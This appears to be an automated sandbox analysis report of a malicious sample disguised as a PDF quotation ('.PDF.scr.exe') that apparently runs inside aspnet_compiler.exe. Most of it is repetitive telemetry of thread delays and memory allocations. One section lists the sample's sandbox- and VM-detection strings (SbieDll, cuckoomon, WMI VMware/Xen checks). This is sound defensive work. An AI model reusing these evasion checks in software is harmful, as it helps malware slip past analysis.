              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID$CMD%SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE&VERSION'SERIALNUMBER)VMWARE|VIRTUAL|A M I|XEN*SELECT * FROM WIN32_COMPUTERSYSTEM+MANUFACTURER,MODEL-MICROSOFT|VMWARE|VIRTUAL.JOHN/ANNA0XXXXXXXX
              Source: QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2638636004.000001195ECF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL2
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeMemory allocated: 1195D040000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeMemory allocated: 11976BA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory allocated: 1F59E050000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory allocated: 1F5B7980000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599855Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599748Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599629Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599500Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 599062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598952Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598260Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 598046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597719Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597609Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597496Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597281Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 597062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596625Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596510Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 596062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595952Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595843Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595734Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595624Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595296Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595186Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 594531Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeWindow / User API: threadDelayed 7548Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeWindow / User API: threadDelayed 2291Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 1208Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 8651Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 1892Thread sleep count: 7548 > 30Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 1892Thread sleep count: 2291 > 30Jump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99671s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99123s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -99014s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -98905s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -98796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -98605s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -98499s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -98233s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -98125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -98015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97796s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97687s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97578s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97468s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -97031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96921s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96592s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96484s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96375s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96265s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -96046s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -95937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -95825s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -95718s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -95479s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -95359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -95249s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -95140s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -95031s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -94921s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -94811s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -94702s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -94593s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe TID: 3872Thread sleep time: -94484s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -27670116110564310s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7156Thread sleep count: 1208 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -599855s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 7156Thread sleep count: 8651 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -599748s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -599629s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -599500s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -599390s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -599281s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -599172s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -599062s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598952s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598843s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598734s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598625s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598515s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598406s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598260s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598156s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -598046s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597937s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597828s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597719s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597609s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597496s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597390s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597281s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597172s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -597062s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596953s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596843s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596734s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596625s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596510s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596406s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596297s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596172s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -596062s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595952s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595843s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595734s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595624s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595515s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595406s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595296s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595186s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -595078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -594968s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -594859s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe TID: 5228Thread sleep time: -594750s >= -30000sJump to behavior
